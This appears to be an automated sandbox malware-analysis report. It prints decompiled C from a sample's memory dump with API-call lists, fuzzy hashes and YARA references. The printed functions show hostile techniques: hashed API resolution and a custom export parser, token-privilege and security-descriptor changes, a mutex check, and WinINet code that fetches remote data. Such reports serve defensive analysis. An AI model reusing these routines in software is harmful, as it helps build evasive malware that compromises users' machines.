				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000AFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000A0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000AB790(_t64,  *0xb2838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000AF190(__edx);
						_t32 = E000AEE10(__edx);
						_v20 = _t26;
						_t33 = E000ABAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E00091AF0(_t53,  &_v28, 0,  *0xb2c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000AF410(_v28, _a4, _v28, _v24 + _v28);
								E0009B570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E0009BF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000ABA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000AB690(_t54);
				}
				return _t43;
			}

0x0009d27b
0x0009d280
0x0009d285
0x0009d28a
0x0009d28d
0x0009d28f
0x0009d337
0x0009d295
0x0009d2a6
0x0009d2ab
0x0009d2b0
0x0009d33b
0x0009d2b6
0x0009d2ca
0x0009d2cd
0x0009d2d6
0x0009d2e8
0x0009d2ec
0x0009d2f1
0x0009d2f6
0x0009d33f
0x0009d341
0x0009d2f8
0x0009d2f8
0x0009d307
0x0009d30c
0x0009d30f
0x0009d311
0x0009d314
0x0009d346
0x0009d346
0x0009d316
0x0009d323
0x0009d32b
0x0009d330
0x0009d333
0x0009d333
0x0009d34f
0x0009d354
0x0009d358
0x0009d358
0x0009d35e
0x0009d363
0x0009d363
0x0009d367
0x0009d36c
0x0009d378

APIs

Part of subcall function 000AB790: InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
Part of subcall function 000AB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Part of subcall function 000ABAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3

Part of subcall function 00091AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

InternetCloseHandle.WININET(00000000), ref: 0009D358

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction ID: 08c8c731cd60d4795642b458628f1f94130608dbed7bd3f3a156df419ae2e68f
Opcode Fuzzy Hash: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction Fuzzy Hash: 7321E4B2E401096BDF00ABE4AC42AFF7BB9DF45754F084435FA04A7203E7759A15A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000A0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000A9C90(_t55, E00097200(0xb1060,  &_v88), 1); // executed
				_t18 = E00099D50(0x647400a5);
				_t20 = E0009BF50(_t55, _t18, E00099D50(0x6ec8785b));
				_t36 =  !=  ? 0xb08d0 : 0xb10b0;
				_t23 = E00097200( !=  ? 0xb08d0 : 0xb10b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E0009BF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E0009BF50(_t58, 9, 0x90ec817);
						_t31 = E00099D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E0009BF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000a0f60
0x000a0f72
0x000a0f8a
0x000a0f97
0x000a0fb0
0x000a0fc6
0x000a0fd1
0x000a0fd6
0x000a0fe2
0x000a0fe4
0x000a0fe6
0x000a0fe8
0x000a0ff6
0x000a0ffb
0x000a100d
0x000a100f
0x000a1011
0x000a101d
0x000a102f
0x000a1034
0x000a1043
0x000a1043
0x000a104c
0x000a1057
0x000a1057
0x000a1065

APIs

Part of subcall function 000A9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000A1043

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction ID: d0b0b4c89df3dddfb10bebbd31f6cbdb2178e57db3e88d39798a30296292a3ab
Opcode Fuzzy Hash: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction Fuzzy Hash: E721D8B2E402197BEF1066A0AC13FFF36689B11714F050434FA18B6283F5A16A1487F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000A2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000A8F20(_t25, 0x28);
				_v52 = E000A1070;
				_t9 = E0009BF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E00097200(0xb0c10,  &_v118);
				_t13 = E0009BF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E0009BF50(_t36, 1, 0xf3c7b77);
				_t16 = E0009BF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E00097200(0xb0790,  &_v84);
				_t22 = CreateWindowExW(0, E00097200(0xb0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000a2f00
0x000a2f0c
0x000a2f12
0x000a2f1a
0x000a2f28
0x000a2f34
0x000a2f48
0x000a2f52
0x000a2f5b
0x000a2f64
0x000a2f75
0x000a2f7f
0x000a2f8c
0x000a2fce
0x000a2fda

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A2FCE

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction ID: 8cf9f4e8ccaace393dda7e269f6ab2b87a3cdffb05642fcb61ba9ad7d9cde57a
Opcode Fuzzy Hash: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction Fuzzy Hash: EA111277E942187AF76066F06C03FEE76589B51B15F240125FF0C79283EAD12A1446B6

Uniqueness

Uniqueness Score: -1.00%

Function 00091490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00091490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E00095CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000A8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E0009BF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E0009BF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000922E0(_t38, 0,  !_t28);
					E00091460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000914a0
0x000914a4
0x000914a6
0x000914ec
0x000914f0
0x000914fc
0x0009150b
0x00091510
0x00091515
0x00000000
0x00000000
0x00091517
0x0009151b
0x000914b0
0x000914b7
0x000914bc
0x000914c2
0x000914c4
0x000914c7
0x00000000
0x00091542
0x00000000
0x000914c7
0x00091524
0x00091529
0x00091532
0x00091534
0x00091536
0x00000000
0x00000000
0x000914c9
0x000914d8
0x000914dd
0x000914e2
0x000914e5
0x000914e8
0x000914e8
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 03da179e66cfeac96f9f0c36ae48a9726aeeea956ce1e1fcd64655db540d2e03
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: 67113D72A4021A7BDF112E61AC02BFE3A699F55765F050120FC29A51D3F532CE20B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 000AB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E0009BF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E0009BF50(_t25, 0, E00099D50(0x640dea48));
					_t10 = E00093750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E0009BF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000ab723
0x000ab72f
0x000ab731
0x000ab733
0x000ab735
0x000ab73a
0x000ab74c
0x000ab75e
0x000ab766
0x000ab768
0x000ab77e
0x000ab76a
0x000ab771
0x000ab77a
0x000ab77a
0x000ab768
0x000ab786

APIs

CreateMutexW.KERNEL32(?,00000000,000B2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB72F

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: e1a553a33ae1fcedd2996e0e2f1cc664e70b3df4c43124e9b37a272d12d64a21
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: E7F062ABA4521837EA1025F57C53FBF724C8BD2B66F050020FE1CA7287EA91AD0056F2

Uniqueness

Uniqueness Score: -1.00%

Function 00098290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00098290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E00091460(_t19, _t9, E00099D50(0x1bde8cd4));
				_t6 = E000922E0(_t19, _t4 + 4, E00099D50(0x1bde8cd4));
				E0009BF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0xb2124, 8, _t6); // executed
				return _t8;
			}

0x00098294
0x00098297
0x00098299
0x000982ec
0x00000000
0x000982ec
0x000982aa
0x000982c6
0x000982d7
0x000982e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction ID: b47334337243ddb6a87379554c9306c69a174ebb3430ee892321c1dcaa6944d1
Opcode Fuzzy Hash: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction Fuzzy Hash: D1E03067D525257BE95132A47C03AEB35484B137BAF0A0130FD0DB6243E9426A1423FB

Uniqueness

Uniqueness Score: -1.00%

Function 000AC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E0009BF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E00099BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000955C0(_t5, 0) & 0x00000001;
			}

0x000ac221
0x000ac230
0x000ac243
0x000ac25a

APIs

WSAStartup.WS2_32(?,?), ref: 000AC243

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: d5895b9e638ac6411623dac02507ec4e805386f91435ba691547b838b3c06b0e
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 2AE086B2D4031437E92071B57C27FF636484711725F450060FE4C551C3F456662891F6

Uniqueness

Uniqueness Score: -1.00%

Function 000A0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E00099D50(0x647400bf);
				E0009BF50(_t15, _t4, E00099D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000a0395
0x000a03a1
0x000a03ba
0x000a03cc
0x000a03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,0009C94D), ref: 000A03CC

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: 1a323cbb603b15f59ad3f8e310fef35c1e3c6bf861833f074b03d76a9f13790f
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 41E08CE6D812143AEA1062D4BC53FFB355C8B12729F050074FA0DA5283F5A666148AE3

Uniqueness

Uniqueness Score: -1.00%

Function 000A8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000A8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E0009BF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E0009D620(_t11, _t13);
						_t8 = E00091460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000a8f4a
0x000a8fa5
0x000a8fa5
0x000a8fa5
0x000a8f4c
0x000a8f50
0x000a8f54
0x000a8f56
0x000a8f58
0x000a8f86
0x000a8f86
0x000a8f8a
0x000a8f93
0x000a8f98
0x000a8f9d
0x000a8f9d
0x000a8f60
0x000a8f60
0x000a8f6d
0x000a8f73
0x000a8f78
0x000a8f7e
0x000a8f80
0x00000000
0x00000000
0x000a8f84
0x00000000
0x00000000
0x00000000
0x000a8f84
0x00000000
0x000a8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000A8F9D

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 17ab3fad13c1647c9a5e7415fb4f31298057cfe3b74b0d69370ef050f416eea8
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: F8F02B72D453AE3ECF311AA0AC45FEE7B854B87BA9F194131FC4929283D961895083F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009B570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009B570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E0009BF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0xb2124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x0009b574
0x0009b577
0x0009b579
0x0009b582
0x0009b593
0x00000000
0x0009b593
0x0009b597

APIs

HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction ID: 12d17eef5bec0ac8183a723a808ff7b064c40324a5c7f0ce1e0f05c7f8cd6a9d
Opcode Fuzzy Hash: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction Fuzzy Hash: 9CD01273A8532877DA212A95BD07FDA7B5C8B15FB1F090021FE0C7B251A692791056E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000A12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00099D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00099D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00091460(_t205, E00091460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00091460(0,  ~( *_t143), _v40));
							E00091460(0,  *_t143, _a4);
							E000A8F20( &_v140, E00099D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000AD680(0, _t91);
									_t176 = _t176 - E000922E0(0, 0, 1);
									E00091460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000A00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00091460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00099D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000922E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00091460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00097DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00091460(__eflags, E000922E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00091460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00091460(__eflags, _t137, E00099D50(0x3638cbc4));
										E00091460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00097DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00099D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00097DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00097DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000955A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0009d839
0x0009d83c
0x0009d83e
0x0009d840
0x0009d847
0x0009d852
0x0009d854
0x0009d85b
0x0009d860
0x0009d862
0x0009d865
0x0009d86d
0x0009d873
0x0009d873
0x0009d880
0x0009d894
0x0009d89f
0x0009d8af
0x0009d8b4
0x0009d8bb
0x0009d8be
0x0009d8c4
0x0009d8cc
0x0009d8d0
0x0009d8d2
0x0009d8d5
0x0009d8ea
0x0009d8f0
0x0009d90d
0x0009d912
0x0009d915
0x0009d919
0x0009d91b
0x0009d920
0x0009d92c
0x0009d942
0x0009d944
0x0009d949
0x0009d94c
0x0009d950
0x0009d920
0x0009d954
0x0009d95d
0x0009d962
0x0009d968
0x0009d98d
0x0009d9c4
0x0009d9d0
0x0009d9d8
0x0009d9db
0x0009d9e0
0x0009d9e5
0x0009d9e7
0x0009d9ea
0x0009d9ec
0x0009d9f2
0x0009d9fc
0x0009d9fe
0x0009da06
0x0009da0e
0x0009da11
0x0009da16
0x0009da19
0x0009da1c
0x0009da1e
0x0009da20
0x0009da22
0x0009da24
0x0009da24
0x0009da2c
0x0009da30
0x0009da30
0x0009da45
0x0009da51
0x0009da56
0x0009da5b
0x0009da61
0x0009da65
0x0009da68
0x0009da68
0x0009da30
0x0009da83
0x0009da88
0x0009da9a
0x0009daaa
0x0009dab1
0x0009dabe
0x0009dac8
0x0009dad7
0x0009dae5
0x0009daec
0x0009daf3
0x0009daf6
0x0009db05
0x0009db0c
0x0009db11
0x0009db14
0x0009db16
0x0009db54
0x0009db18
0x0009db1e
0x0009db21
0x0009db23
0x0009db59
0x0009db25
0x0009db25
0x0009db30
0x0009db35
0x0009db3a
0x0009db44
0x0009db47
0x0009db4a
0x0009db4b
0x0009db4b
0x0009db4f
0x0009db4f
0x0009db23
0x0009db70
0x0009db70
0x0009d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0009d96a
0x0009d973
0x0009d974
0x0009d977
0x0009d97a
0x0009d983
0x0009d983
0x0009d86d
0x0009db72
0x0009db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0009DB62
